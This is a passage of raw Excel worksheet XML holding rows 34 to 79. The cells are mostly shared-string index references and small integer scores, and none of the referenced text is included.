      <c r="J34" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="35" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>78</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>79</v>
      </c>
      <c r="E35" s="11">
        <v>2</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>490</v>
      </c>
      <c r="G35" s="11">
        <v>0</v>
      </c>
      <c r="H35" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I35" s="11">
        <v>0</v>
      </c>
      <c r="J35" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="36" spans="1:10" ht="45" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>80</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>81</v>
      </c>
      <c r="E36" s="11">
        <v>4</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>503</v>
      </c>
      <c r="G36" s="11">
        <v>0</v>
      </c>
      <c r="H36" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I36" s="11">
        <v>0</v>
      </c>
      <c r="J36" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="37" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>82</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>83</v>
      </c>
      <c r="E37" s="11">
        <v>2</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>506</v>
      </c>
      <c r="G37" s="11">
        <v>0</v>
      </c>
      <c r="H37" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I37" s="11">
        <v>0</v>
      </c>
      <c r="J37" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="38" spans="1:10" ht="180" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>85</v>
      </c>
      <c r="E38" s="11">
        <v>2</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>516</v>
      </c>
      <c r="G38" s="11">
        <v>0</v>
      </c>
      <c r="H38" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I38" s="11">
        <v>0</v>
      </c>
      <c r="J38" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="39" spans="1:10" ht="315" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>86</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>87</v>
      </c>
      <c r="E39" s="11">
        <v>2</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G39" s="11">
        <v>3</v>
      </c>
      <c r="H39" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I39" s="11">
        <v>1</v>
      </c>
      <c r="J39" s="3" t="s">
        <v>520</v>
      </c>
    </row>
    <row r="40" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>88</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>89</v>
      </c>
      <c r="E40" s="11">
        <v>2</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>527</v>
      </c>
      <c r="G40" s="11">
        <v>0</v>
      </c>
      <c r="H40" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I40" s="11">
        <v>2</v>
      </c>
      <c r="J40" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="41" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>90</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>91</v>
      </c>
      <c r="E41" s="11">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>527</v>
      </c>
      <c r="G41" s="11">
        <v>0</v>
      </c>
      <c r="H41" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I41" s="11">
        <v>0</v>
      </c>
      <c r="J41" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="42" spans="1:10" ht="345" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>93</v>
      </c>
      <c r="E42" s="11">
        <v>2</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>527</v>
      </c>
      <c r="G42" s="11">
        <v>0</v>
      </c>
      <c r="H42" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I42" s="11">
        <v>0</v>
      </c>
      <c r="J42" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="43" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>94</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>95</v>
      </c>
      <c r="E43" s="11">
        <v>2</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G43" s="11">
        <v>0</v>
      </c>
      <c r="H43" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I43" s="11">
        <v>0</v>
      </c>
      <c r="J43" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="44" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>96</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>97</v>
      </c>
      <c r="E44" s="11">
        <v>2</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G44" s="11">
        <v>0</v>
      </c>
      <c r="H44" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I44" s="11">
        <v>0</v>
      </c>
      <c r="J44" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="45" spans="1:10" ht="330" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>98</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>99</v>
      </c>
      <c r="E45" s="11">
        <v>3</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>527</v>
      </c>
      <c r="G45" s="11">
        <v>0</v>
      </c>
      <c r="H45" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I45" s="11">
        <v>0</v>
      </c>
      <c r="J45" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="46" spans="1:10" ht="90" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>100</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>101</v>
      </c>
      <c r="E46" s="11">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>526</v>
      </c>
      <c r="G46" s="11">
        <v>0</v>
      </c>
      <c r="H46" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I46" s="11">
        <v>0</v>
      </c>
      <c r="J46" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="47" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>102</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>103</v>
      </c>
      <c r="E47" s="11">
        <v>3</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>526</v>
      </c>
      <c r="G47" s="11">
        <v>0</v>
      </c>
      <c r="H47" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I47" s="11">
        <v>0</v>
      </c>
      <c r="J47" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="48" spans="1:10" ht="270" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>104</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>105</v>
      </c>
      <c r="E48" s="11">
        <v>3</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>547</v>
      </c>
      <c r="G48" s="11">
        <v>0</v>
      </c>
      <c r="H48" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I48" s="11">
        <v>0</v>
      </c>
      <c r="J48" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="49" spans="1:10" ht="120" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>106</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>107</v>
      </c>
      <c r="E49" s="11">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G49" s="11">
        <v>0</v>
      </c>
      <c r="H49" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I49" s="11">
        <v>0</v>
      </c>
      <c r="J49" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="50" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>108</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>109</v>
      </c>
      <c r="E50" s="11">
        <v>2</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G50" s="11">
        <v>0</v>
      </c>
      <c r="H50" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I50" s="11">
        <v>0</v>
      </c>
      <c r="J50" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="51" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>110</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>111</v>
      </c>
      <c r="E51" s="11">
        <v>4</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>550</v>
      </c>
      <c r="G51" s="11">
        <v>4</v>
      </c>
      <c r="H51" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I51" s="11">
        <v>0</v>
      </c>
      <c r="J51" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="52" spans="1:10" ht="165" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>112</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>113</v>
      </c>
      <c r="E52" s="11">
        <v>3</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>555</v>
      </c>
      <c r="G52" s="11">
        <v>0</v>
      </c>
      <c r="H52" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I52" s="11">
        <v>2</v>
      </c>
      <c r="J52" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="53" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>114</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>70</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>115</v>
      </c>
      <c r="E53" s="11">
        <v>3</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>557</v>
      </c>
      <c r="G53" s="11">
        <v>0</v>
      </c>
      <c r="H53" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I53" s="11">
        <v>2</v>
      </c>
      <c r="J53" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="54" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A54" s="1" t="s">
        <v>118</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>119</v>
      </c>
      <c r="E54" s="11">
        <v>3</v>
      </c>
      <c r="F54" s="1" t="s">
        <v>424</v>
      </c>
      <c r="G54" s="11">
        <v>3</v>
      </c>
      <c r="H54" s="3" t="s">
        <v>425</v>
      </c>
      <c r="I54" s="11">
        <v>2</v>
      </c>
      <c r="J54" s="3" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="55" spans="1:10" ht="210" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>120</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>121</v>
      </c>
      <c r="E55" s="11">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>434</v>
      </c>
      <c r="G55" s="11">
        <v>0</v>
      </c>
      <c r="H55" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I55" s="11">
        <v>0</v>
      </c>
      <c r="J55" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="56" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A56" s="1" t="s">
        <v>122</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>123</v>
      </c>
      <c r="E56" s="11">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>434</v>
      </c>
      <c r="G56" s="11">
        <v>0</v>
      </c>
      <c r="H56" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I56" s="11">
        <v>0</v>
      </c>
      <c r="J56" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="57" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A57" s="1" t="s">
        <v>124</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>125</v>
      </c>
      <c r="E57" s="11">
        <v>3</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>436</v>
      </c>
      <c r="G57" s="11">
        <v>0</v>
      </c>
      <c r="H57" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I57" s="11">
        <v>0</v>
      </c>
      <c r="J57" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="58" spans="1:10" ht="150" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>126</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>127</v>
      </c>
      <c r="E58" s="11">
        <v>3</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>437</v>
      </c>
      <c r="G58" s="11">
        <v>0</v>
      </c>
      <c r="H58" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I58" s="11">
        <v>0</v>
      </c>
      <c r="J58" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="59" spans="1:10" ht="315" x14ac:dyDescent="0.2">
      <c r="A59" s="1" t="s">
        <v>128</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D59" s="1" t="s">
        <v>129</v>
      </c>
      <c r="E59" s="11">
        <v>3</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>435</v>
      </c>
      <c r="G59" s="11">
        <v>0</v>
      </c>
      <c r="H59" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I59" s="11">
        <v>0</v>
      </c>
      <c r="J59" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="60" spans="1:10" ht="105" x14ac:dyDescent="0.2">
      <c r="A60" s="1" t="s">
        <v>130</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D60" s="1" t="s">
        <v>131</v>
      </c>
      <c r="E60" s="11">
        <v>1</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>444</v>
      </c>
      <c r="G60" s="11">
        <v>0</v>
      </c>
      <c r="H60" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I60" s="11">
        <v>0</v>
      </c>
      <c r="J60" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="61" spans="1:10" ht="240" x14ac:dyDescent="0.2">
      <c r="A61" s="1" t="s">
        <v>132</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D61" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E61" s="11">
        <v>4</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>445</v>
      </c>
      <c r="G61" s="11">
        <v>3</v>
      </c>
      <c r="H61" s="3" t="s">
        <v>446</v>
      </c>
      <c r="I61" s="11">
        <v>0</v>
      </c>
      <c r="J61" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="62" spans="1:10" ht="285" x14ac:dyDescent="0.2">
      <c r="A62" s="1" t="s">
        <v>134</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D62" s="1" t="s">
        <v>135</v>
      </c>
      <c r="E62" s="11">
        <v>4</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>448</v>
      </c>
      <c r="G62" s="11">
        <v>0</v>
      </c>
      <c r="H62" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I62" s="11">
        <v>0</v>
      </c>
      <c r="J62" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="63" spans="1:10" ht="135" x14ac:dyDescent="0.2">
      <c r="A63" s="1" t="s">
        <v>136</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D63" s="1" t="s">
        <v>137</v>
      </c>
      <c r="E63" s="11">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>452</v>
      </c>
      <c r="G63" s="11">
        <v>0</v>
      </c>
      <c r="H63" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I63" s="11">
        <v>0</v>
      </c>
      <c r="J63" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="64" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A64" s="1" t="s">
        <v>138</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D64" s="1" t="s">
        <v>139</v>
      </c>
      <c r="E64" s="11">
        <v>2</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>458</v>
      </c>
      <c r="G64" s="11">
        <v>0</v>
      </c>
      <c r="H64" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I64" s="11">
        <v>0</v>
      </c>
      <c r="J64" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="65" spans="1:10" ht="75" x14ac:dyDescent="0.2">
      <c r="A65" s="1" t="s">
        <v>140</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D65" s="1" t="s">
        <v>141</v>
      </c>
      <c r="E65" s="11">
        <v>3</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>460</v>
      </c>
      <c r="G65" s="11">
        <v>0</v>
      </c>
      <c r="H65" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I65" s="11">
        <v>0</v>
      </c>
      <c r="J65" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="66" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A66" s="1" t="s">
        <v>142</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D66" s="1" t="s">
        <v>143</v>
      </c>
      <c r="E66" s="11">
        <v>3</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>476</v>
      </c>
      <c r="G66" s="11">
        <v>0</v>
      </c>
      <c r="H66" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I66" s="11">
        <v>0</v>
      </c>
      <c r="J66" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="67" spans="1:10" ht="180" x14ac:dyDescent="0.2">
      <c r="A67" s="1" t="s">
        <v>144</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D67" s="1" t="s">
        <v>145</v>
      </c>
      <c r="E67" s="11">
        <v>2</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>494</v>
      </c>
      <c r="G67" s="11">
        <v>2</v>
      </c>
      <c r="H67" s="3" t="s">
        <v>439</v>
      </c>
      <c r="I67" s="11">
        <v>0</v>
      </c>
      <c r="J67" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="68" spans="1:10" ht="210" x14ac:dyDescent="0.2">
      <c r="A68" s="1" t="s">
        <v>146</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D68" s="1" t="s">
        <v>147</v>
      </c>
      <c r="E68" s="11">
        <v>2</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>496</v>
      </c>
      <c r="G68" s="11">
        <v>0</v>
      </c>
      <c r="H68" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I68" s="11">
        <v>0</v>
      </c>
      <c r="J68" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="69" spans="1:10" ht="390" x14ac:dyDescent="0.2">
      <c r="A69" s="1" t="s">
        <v>148</v>
      </c>
      <c r="B69" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D69" s="1" t="s">
        <v>149</v>
      </c>
      <c r="E69" s="11">
        <v>2</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>504</v>
      </c>
      <c r="G69" s="11">
        <v>0</v>
      </c>
      <c r="H69" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I69" s="11">
        <v>0</v>
      </c>
      <c r="J69" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="70" spans="1:10" ht="105" x14ac:dyDescent="0.2">
      <c r="A70" s="1" t="s">
        <v>150</v>
      </c>
      <c r="B70" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D70" s="1" t="s">
        <v>151</v>
      </c>
      <c r="E70" s="11">
        <v>1</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>505</v>
      </c>
      <c r="G70" s="11">
        <v>0</v>
      </c>
      <c r="H70" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I70" s="11">
        <v>0</v>
      </c>
      <c r="J70" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="71" spans="1:10" ht="330" x14ac:dyDescent="0.2">
      <c r="A71" s="1" t="s">
        <v>152</v>
      </c>
      <c r="B71" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D71" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E71" s="11">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>506</v>
      </c>
      <c r="G71" s="11">
        <v>0</v>
      </c>
      <c r="H71" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I71" s="11">
        <v>1</v>
      </c>
      <c r="J71" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="72" spans="1:10" ht="180" x14ac:dyDescent="0.2">
      <c r="A72" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B72" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D72" s="1" t="s">
        <v>85</v>
      </c>
      <c r="E72" s="11">
        <v>2</v>
      </c>
      <c r="F72" s="3" t="s">
        <v>516</v>
      </c>
      <c r="G72" s="11">
        <v>0</v>
      </c>
      <c r="H72" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I72" s="11">
        <v>0</v>
      </c>
      <c r="J72" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="73" spans="1:10" ht="315" x14ac:dyDescent="0.2">
      <c r="A73" s="1" t="s">
        <v>154</v>
      </c>
      <c r="B73" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D73" s="1" t="s">
        <v>155</v>
      </c>
      <c r="E73" s="11">
        <v>3</v>
      </c>
      <c r="F73" s="3" t="s">
        <v>486</v>
      </c>
      <c r="G73" s="11">
        <v>0</v>
      </c>
      <c r="H73" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I73" s="11">
        <v>0</v>
      </c>
      <c r="J73" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="74" spans="1:10" ht="210" x14ac:dyDescent="0.2">
      <c r="A74" s="1" t="s">
        <v>156</v>
      </c>
      <c r="B74" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D74" s="1" t="s">
        <v>157</v>
      </c>
      <c r="E74" s="11">
        <v>2</v>
      </c>
      <c r="F74" s="3" t="s">
        <v>521</v>
      </c>
      <c r="G74" s="11">
        <v>0</v>
      </c>
      <c r="H74" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I74" s="11">
        <v>0</v>
      </c>
      <c r="J74" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="75" spans="1:10" ht="225" x14ac:dyDescent="0.2">
      <c r="A75" s="1" t="s">
        <v>158</v>
      </c>
      <c r="B75" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D75" s="1" t="s">
        <v>159</v>
      </c>
      <c r="E75" s="11">
        <v>1</v>
      </c>
      <c r="F75" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G75" s="11">
        <v>0</v>
      </c>
      <c r="H75" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I75" s="11">
        <v>0</v>
      </c>
      <c r="J75" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="76" spans="1:10" ht="195" x14ac:dyDescent="0.2">
      <c r="A76" s="1" t="s">
        <v>160</v>
      </c>
      <c r="B76" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D76" s="1" t="s">
        <v>161</v>
      </c>
      <c r="E76" s="11">
        <v>2</v>
      </c>
      <c r="F76" s="3" t="s">
        <v>486</v>
      </c>
      <c r="G76" s="11">
        <v>0</v>
      </c>
      <c r="H76" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I76" s="11">
        <v>0</v>
      </c>
      <c r="J76" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="77" spans="1:10" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A77" s="1" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D77" s="1" t="s">
        <v>163</v>
      </c>
      <c r="E77" s="11">
        <v>1</v>
      </c>
      <c r="F77" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G77" s="11">
        <v>3</v>
      </c>
      <c r="H77" s="3" t="s">
        <v>522</v>
      </c>
      <c r="I77" s="11">
        <v>0</v>
      </c>
      <c r="J77" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="78" spans="1:10" ht="210" x14ac:dyDescent="0.2">
      <c r="A78" s="1" t="s">
        <v>164</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>117</v>
      </c>
      <c r="D78" s="1" t="s">
        <v>165</v>
      </c>
      <c r="E78" s="11">
        <v>2</v>
      </c>
      <c r="F78" s="3" t="s">
        <v>523</v>
      </c>
      <c r="G78" s="11">
        <v>0</v>
      </c>
      <c r="H78" s="3" t="s">
        <v>433</v>
      </c>
      <c r="I78" s="11">
        <v>0</v>
      </c>
      <c r="J78" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="79" spans="1:10" ht="225" x14ac:dyDescent="0.2">
      <c r="A79" s="1" t="s">
        <v>166</v>
      </c>
